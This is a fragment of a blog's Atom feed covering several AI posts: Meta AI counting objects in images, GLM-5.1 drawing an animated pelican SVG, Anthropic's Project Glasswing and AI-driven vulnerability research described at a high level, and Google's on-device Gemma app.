      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;568&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;263&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;392&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;274&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;3&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;eye&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;462&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;395&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;582&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;398&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;2&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;ear&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;359&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;313&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;680&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;294&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;2&lt;/span&gt;
  }
]&lt;/pre&gt;&lt;/div&gt;
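&lt;p&gt;That count-mode JSON is easy to post-process. Here's a quick sketch totalling the objects in a response shaped like the one above, using a trimmed-down copy of the data:&lt;/p&gt;

```python
import json

# A trimmed copy of the count-mode response structure shown above.
response = json.loads("""[
  {"object_name": "raccoon whisker", "points": [{"x": 403, "y": 445}], "count": 12},
  {"object_name": "raccoon paw claw", "points": [{"x": 406, "y": 845}], "count": 8},
  {"object_name": "eye", "points": [{"x": 462, "y": 395}], "count": 2}
]""")

totals = {item["object_name"]: item["count"] for item in response}
grand_total = sum(totals.values())
```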
&lt;p&gt;So Meta AI has the ability to count a raccoon's whiskers baked into the default set of tools.&lt;/p&gt;
&lt;p&gt;Which means... it can count pelicans too!&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-count-pelicans.jpg" alt="Screenshot of a Meta AI conversation where the user uploaded a photo of pelicans on rocks and asked &amp;quot;Count the pelicans&amp;quot;. response reads: &amp;quot;That rocky haul-out is packed — I count 25 brown pelicans in your photo. I went bird by bird, including the ones tucked behind rocks, heads turned away, or just peeking out at the edges. They're all California brown pelicans, with those pale yellow heads and long bills, clustered on the riprap right at the waterline. To make it easy to verify, I've numbered each one on the image:&amp;quot; followed by an annotated version of the photo with red numbered circles (1–25) placed on each pelican. The annotated image has a downward chevron and an &amp;quot;Open&amp;quot; button at the bottom right." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Here's that overlay &lt;a href="https://static.simonwillison.net/static/2026/meta-count-pelicans.html"&gt;exported as HTML&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;strong&gt;Update&lt;/strong&gt;: Meta's &lt;a href="https://twitter.com/jacktripleu/status/2042050863800447387"&gt;Jack Wu confirms&lt;/a&gt; that these tools are part of the new harness they launched alongside the new model.&lt;/em&gt;&lt;/p&gt;

&lt;h4 id="maybe-open-weights-in-the-future-"&gt;Maybe open weights in the future?&lt;/h4&gt;
&lt;p&gt;On Twitter &lt;a href="https://twitter.com/alexandr_wang/status/2041909388852748717"&gt;Alexandr Wang said&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;this is step one. bigger models are already in development with infrastructure scaling to match. private api preview open to select partners today, with plans to open-source future versions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I really hope they do go back to open-sourcing their models. Llama 3.1/3.2/3.3 were excellent laptop-scale model families, and the introductory blog post for Muse Spark had this to say about efficiency:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[...] we can reach the same capabilities with over an order of magnitude less compute than our previous model, Llama 4 Maverick. This improvement also makes Muse Spark significantly more efficient than the leading base models available for comparison.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So are Meta back in the frontier model game? &lt;a href="https://twitter.com/ArtificialAnlys/status/2041913043379220801"&gt;Artificial Analysis&lt;/a&gt; think so - they scored Muse Spark at 52, "behind only Gemini 3.1 Pro, GPT-5.4, and Claude Opus 4.6". Last year's Llama 4 Maverick and Scout scored 18 and 13 respectively.&lt;/p&gt;
&lt;p&gt;I'm waiting for API access - while the tool collection on &lt;a href="https://meta.ai/"&gt;meta.ai&lt;/a&gt; is quite strong, the real test of a model like this is still what we can build on top of it.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/meta"&gt;meta&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/facebook"&gt;facebook&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/code-interpreter"&gt;code-interpreter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="llm-reasoning"/><category term="pelican-riding-a-bicycle"/><category term="ai"/><category term="llms"/><category term="meta"/><category term="llm-release"/><category term="generative-ai"/><category term="facebook"/><category term="code-interpreter"/><category term="llm-tool-use"/></entry><entry><title>GLM-5.1: Towards Long-Horizon Tasks</title><link href="https://simonwillison.net/2026/Apr/7/glm-51/#atom-tag" rel="alternate"/><published>2026-04-07T21:25:14+00:00</published><updated>2026-04-07T21:25:14+00:00</updated><id>https://simonwillison.net/2026/Apr/7/glm-51/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://z.ai/blog/glm-5.1"&gt;GLM-5.1: Towards Long-Horizon Tasks&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Chinese AI lab Z.ai's latest model is a giant 754B parameter, 1.51TB (on &lt;a href="https://huggingface.co/zai-org/GLM-5.1"&gt;Hugging Face&lt;/a&gt;) MIT-licensed monster - the same size as their previous GLM-5 release, and sharing the &lt;a href="https://huggingface.co/papers/2602.15763"&gt;same paper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It's available &lt;a href="https://openrouter.ai/z-ai/glm-5.1"&gt;via OpenRouter&lt;/a&gt; so I asked it to draw me a pelican:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-openrouter
llm -m openrouter/z-ai/glm-5.1 'Generate an SVG of a pelican on a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And something new happened... unprompted, the model &lt;a href="https://gist.github.com/simonw/af7170f54256cc007ef28a8721564be8"&gt;decided to give me&lt;/a&gt; an HTML page that included both the SVG and a separate set of CSS animations!&lt;/p&gt;
&lt;p&gt;The SVG was excellent, and might be my new favorite from an open weights model:&lt;/p&gt;
&lt;p&gt;&lt;img alt="The bicycle is red and has a frame the correct shape and wheels with spokes. The pelican is a perky little fella." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;But the animation &lt;a href="https://gisthost.github.io/?73bb6808b18c2482f66e5f082c75f36e"&gt;broke it&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Animation - the wheels and pedals rotate, the clouds move... and the pelican has vanished, but there is a little blob bobbing up and down in the top left corner." src="https://static.simonwillison.net/static/2026/glm-5.1-broken-light-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;That's the pelican, floating up in the top left corner.&lt;/p&gt;
&lt;p&gt;I usually don't do follow-up prompts for the pelican test, but in this case I made an exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -c 'the animation is a bit broken, the pelican ends up positioned off the screen at the top right'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;GLM 5.1 replied:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The issue is that CSS &lt;code&gt;transform&lt;/code&gt; animations on SVG elements override the SVG &lt;code&gt;transform&lt;/code&gt; attribute used for positioning, causing the pelican to lose its placement and fly off to the top-right. The fix is to separate positioning (SVG attribute) from animation (inner group) and use &lt;code&gt;&amp;lt;animateTransform&amp;gt;&lt;/code&gt; for SVG rotations since it handles coordinate systems correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And spat out &lt;a href="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed.html"&gt;fresh HTML&lt;/a&gt; which fixed the problem!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Now everything is right - the bicycle rotates correctly, the pelican sits on it and bobs up and down, and its lower beak moves slightly as well." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed-medium-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;I particularly like the animation of the beak, which is described in the SVG comments like so:&lt;/p&gt;
&lt;div class="highlight highlight-text-xml-svg"&gt;&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;&amp;lt;!--&lt;/span&gt; Pouch (lower beak) with wobble &lt;span class="pl-c"&gt;--&amp;gt;&lt;/span&gt;&lt;/span&gt;
&amp;lt;&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M42,-58 Q43,-50 48,-42 Q55,-35 62,-38 Q70,-42 75,-60 L42,-58 Z&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;url(#pouchGrad)&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#b06008&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.9&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M48,-50 Q55,-46 60,-52&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;none&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#c06a08&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.8&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.6&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;animateTransform&lt;/span&gt; &lt;span class="pl-e"&gt;attributeName&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;transform&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;type&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;scale&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;values&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1,1; 1.03,0.97; 1,1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;dur&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.75s&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;repeatCount&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;indefinite&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;additive&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;sum&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
&amp;lt;/&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: On Bluesky &lt;a href="https://bsky.app/profile/charles.capps.me/post/3miwrn42mjc2t"&gt;@charles.capps.me suggested&lt;/a&gt; a "NORTH VIRGINIA OPOSSUM ON AN E-SCOOTER" and...&lt;/p&gt;
&lt;p&gt;&lt;img alt="This is so great. It's dark, the possum is clearly a possum, it's riding an escooter, lovely animation, tail bobbing up and down, caption says NORTH VIRGINIA OPOSSUM, CRUISING THE COMMONWEALTH SINCE DUSK - only glitch is that it occasionally blinks and the eyes fall off the face" src="https://static.simonwillison.net/static/2026/glm-possum-escooter.gif.gif" /&gt;&lt;/p&gt;
&lt;p&gt;The HTML+SVG comments on that one include &lt;code&gt;/* Earring sparkle */, &amp;lt;!-- Opossum fur gradient --&amp;gt;, &amp;lt;!-- Distant treeline silhouette - Virginia pines --&amp;gt;, &amp;lt;!-- Front paw on handlebar --&amp;gt;&lt;/code&gt; - here's &lt;a href="https://gist.github.com/simonw/1864b89f5304eba03c3ded4697e156c4"&gt;the transcript&lt;/a&gt; and the &lt;a href="https://static.simonwillison.net/static/2026/glm-possum-escooter.html"&gt;HTML result&lt;/a&gt;.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/glm"&gt;glm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-in-china"&gt;ai-in-china&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/svg"&gt;svg&lt;/a&gt;&lt;/p&gt;



</summary><category term="llm-release"/><category term="generative-ai"/><category term="glm"/><category term="pelican-riding-a-bicycle"/><category term="ai"/><category term="ai-in-china"/><category term="llms"/><category term="css"/><category term="svg"/></entry><entry><title>Anthropic's Project Glasswing - restricting Claude Mythos to security researchers - sounds necessary to me</title><link href="https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag" rel="alternate"/><published>2026-04-07T20:52:54+00:00</published><updated>2026-04-07T20:52:54+00:00</updated><id>https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic &lt;em&gt;didn't&lt;/em&gt; release their latest model, Claude Mythos (&lt;a href="https://www-cdn.anthropic.com/53566bf5440a10affd749724787c8913a2ae0841.pdf"&gt;system card PDF&lt;/a&gt;), today. They have instead made it available to a very restricted set of preview partners under their newly announced &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The model is general purpose, similar to Claude Opus 4.6, but Anthropic claim that its cybersecurity research abilities are strong enough that they need to give the software industry as a whole time to prepare.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Mythos Preview has already found thousands of high-severity vulnerabilities, including some in &lt;em&gt;every major operating system and web browser&lt;/em&gt;. Given the rate of AI progress, it will not be long before such capabilities proliferate, potentially beyond actors who are committed to deploying them safely.&lt;/p&gt;
&lt;p&gt;[...]&lt;/p&gt;
&lt;p&gt;Project Glasswing partners will receive access to Claude Mythos Preview to find and fix vulnerabilities or weaknesses in their foundational systems—systems that represent a very large portion of the world’s shared cyberattack surface. We anticipate this work will focus on tasks like local vulnerability detection, black box testing of binaries, securing endpoints, and penetration testing of systems.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;There's a great deal more technical detail in &lt;a href="https://red.anthropic.com/2026/mythos-preview/"&gt;Assessing Claude Mythos Preview’s cybersecurity capabilities&lt;/a&gt; on the Anthropic Red Team blog:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;In one case, Mythos Preview wrote a web browser exploit that chained together four vulnerabilities, writing a complex &lt;a href="https://en.wikipedia.org/wiki/JIT_spraying"&gt;JIT heap spray&lt;/a&gt; that escaped both renderer and OS sandboxes. It autonomously obtained local privilege escalation exploits on Linux and other operating systems by exploiting subtle race conditions and KASLR-bypasses. And it autonomously wrote a remote code execution exploit on FreeBSD's NFS server that granted full root access to unauthenticated users by splitting a 20-gadget ROP chain over multiple packets.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Plus this comparison with Claude Opus 4.6:&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;Our internal evaluations showed that Opus 4.6 generally had a near-0% success rate at autonomous exploit development. But Mythos Preview is in a different league. For example, Opus 4.6 turned the vulnerabilities it had found in Mozilla’s Firefox 147 JavaScript engine—all patched in Firefox 148—into JavaScript shell exploits only two times out of several hundred attempts. We re-ran this experiment as a benchmark for Mythos Preview, which developed working exploits 181 times, and achieved register control on 29 more.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Saying "our model is too dangerous to release" is a great way to build buzz around a new model, but in this case I expect their caution is warranted.&lt;/p&gt;
&lt;p&gt;Just a few days ago (&lt;a href="https://simonwillison.net/2026/Apr/3/"&gt;last Friday&lt;/a&gt;) I started a new &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; tag on this blog to acknowledge an uptick in credible security professionals sounding the alarm on how good modern LLMs have got at vulnerability research.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt; of the Linux kernel:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt; of &lt;code&gt;curl&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And Thomas Ptacek published &lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;, a post inspired by his &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;podcast conversation&lt;/a&gt; with Anthropic's Nicholas Carlini.&lt;/p&gt;
&lt;p&gt;Anthropic have a five minute &lt;a href="https://www.youtube.com/watch?v=INGOC6-LLv0"&gt;talking heads video&lt;/a&gt; describing the Glasswing project. Nicholas Carlini appears as one of those talking heads, saying (highlights mine):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It has the ability to chain together vulnerabilities. So what this means is you find two vulnerabilities, either of which doesn't really get you very much independently. But this model is able to create exploits out of three, four, or sometimes five vulnerabilities that in sequence give you some kind of very sophisticated end outcome. [...]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I've found more bugs in the last couple of weeks than I found in the rest of my life combined&lt;/strong&gt;. We've used the model to scan a bunch of open source code, and the thing that we went for first was operating systems, because this is the code that underlies the entire internet infrastructure. &lt;strong&gt;For OpenBSD, we found a bug that's been present for 27 years, where I can send a couple of pieces of data to any OpenBSD server and crash it&lt;/strong&gt;. On Linux, we found a number of vulnerabilities where as a user with no permissions, I can elevate myself to the administrator by just running some binary on my machine. For each of these bugs, we told the maintainers who actually run the software about them, and they went and fixed them and have deployed the patches so that anyone who runs the software is no longer vulnerable to these attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I found this on the &lt;a href="https://www.openbsd.org/errata78.html"&gt;OpenBSD 7.8 errata page&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;025: RELIABILITY FIX: March 25, 2026&lt;/strong&gt;  &lt;em&gt;All architectures&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;TCP packets with invalid SACK options could crash the kernel.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ftp.openbsd.org/pub/OpenBSD/patches/7.8/common/025_sack.patch.sig"&gt;A source code patch exists which remedies this problem.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tracked that change down in the &lt;a href="https://github.com/openbsd/src"&gt;GitHub mirror&lt;/a&gt; of the OpenBSD CVS repo (apparently they still use CVS!) and found it &lt;a href="https://github.com/openbsd/src/blame/master/sys/netinet/tcp_input.c#L2461"&gt;using git blame&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/openbsd-27-years.jpg" alt="Screenshot of a Git blame view of C source code around line 2455 showing TCP SACK hole validation logic. Code includes checks using SEQ_GT, SEQ_LT macros on fields like th-&amp;gt;th_ack, tp-&amp;gt;snd_una, sack.start, sack.end, tp-&amp;gt;snd_max, and tp-&amp;gt;snd_holes. Most commits are from 25–27 years ago with messages like &amp;quot;more SACK hole validity testin...&amp;quot; and &amp;quot;knf&amp;quot;, while one recent commit from 3 weeks ago (&amp;quot;Ignore TCP SACK packets wit...&amp;quot;) is highlighted with an orange left border, adding a new guard &amp;quot;if (SEQ_LT(sack.start, tp-&amp;gt;snd_una)) continue;&amp;quot;" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Sure enough, the surrounding code is from 27 years ago.&lt;/p&gt;
&lt;p&gt;I'm not sure which Linux vulnerability Nicholas was describing, but it may have been &lt;a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=5133b61aaf437e5f25b1b396b14242a6bb0508e2"&gt;this NFS one&lt;/a&gt; recently covered &lt;a href="https://mtlynch.io/claude-code-found-linux-vulnerability/"&gt;by Michael Lynch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's enough smoke here that I believe there's a fire. It's not surprising to find vulnerabilities in decades-old software, especially software mostly written in C, but what's new is that coding agents run by the latest frontier LLMs are proving tirelessly capable of digging up these issues.&lt;/p&gt;
&lt;p&gt;I actually thought to myself on Friday that this sounded like an industry-wide reckoning in the making, and that it might warrant a huge investment of time and money to get ahead of the inevitable barrage of vulnerabilities. Project Glasswing incorporates "$100M in usage credits ... as well as $4M in direct donations to open-source security organizations". Partners include AWS, Apple, Microsoft, Google, and the Linux Foundation. It would be great to see OpenAI involved as well - GPT-5.4 already has a strong reputation for finding security vulnerabilities and they have stronger models on the near horizon.&lt;/p&gt;
&lt;p&gt;The bad news for those of us who are &lt;em&gt;not&lt;/em&gt; trusted partners is this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We do not plan to make Claude Mythos Preview generally available, but our eventual goal is to enable our users to safely deploy Mythos-class models at scale—for cybersecurity purposes, but also for the myriad other benefits that such highly capable models will bring. To do so, we need to make progress in developing cybersecurity (and other) safeguards that detect and block the model’s most dangerous outputs. We plan to launch new safeguards with an upcoming Claude Opus model, allowing us to improve and refine them with a model that does not pose the same level of risk as Mythos Preview.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I can live with that. I think the security risks really are credible here, and having extra time for trusted teams to get ahead of them is a reasonable trade-off.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="anthropic"/><category term="nicholas-carlini"/><category term="ai"/><category term="llms"/><category term="ai-ethics"/><category term="thomas-ptacek"/><category term="llm-release"/><category term="security"/><category term="generative-ai"/><category term="ai-security-research"/></entry><entry><title>Google AI Edge Gallery</title><link href="https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-tag" rel="alternate"/><published>2026-04-06T05:18:26+00:00</published><updated>2026-04-06T05:18:26+00:00</updated><id>https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://apps.apple.com/nl/app/google-ai-edge-gallery/id6749645337"&gt;Google AI Edge Gallery&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Terrible name, really great app: this is Google's official app for running their Gemma 4 models (the E2B and E4B sizes, plus some members of the Gemma 3 family) directly on your iPhone.&lt;/p&gt;
&lt;p&gt;It works &lt;em&gt;really&lt;/em&gt; well. The E2B model is a 2.54GB download and is both fast and genuinely useful.&lt;/p&gt;
&lt;p&gt;The app also provides "ask questions about images" and audio transcription (up to 30s) with the two small Gemma 4 models, and has an interesting "skills" demo which demonstrates tool calling against eight different interactive widgets, each implemented as an HTML page (though sadly the source code is not visible): interactive-map, kitchen-adventure, calculate-hash, text-spinner, mood-tracker, mnemonic-password, query-wikipedia, and qr-code.&lt;/p&gt;
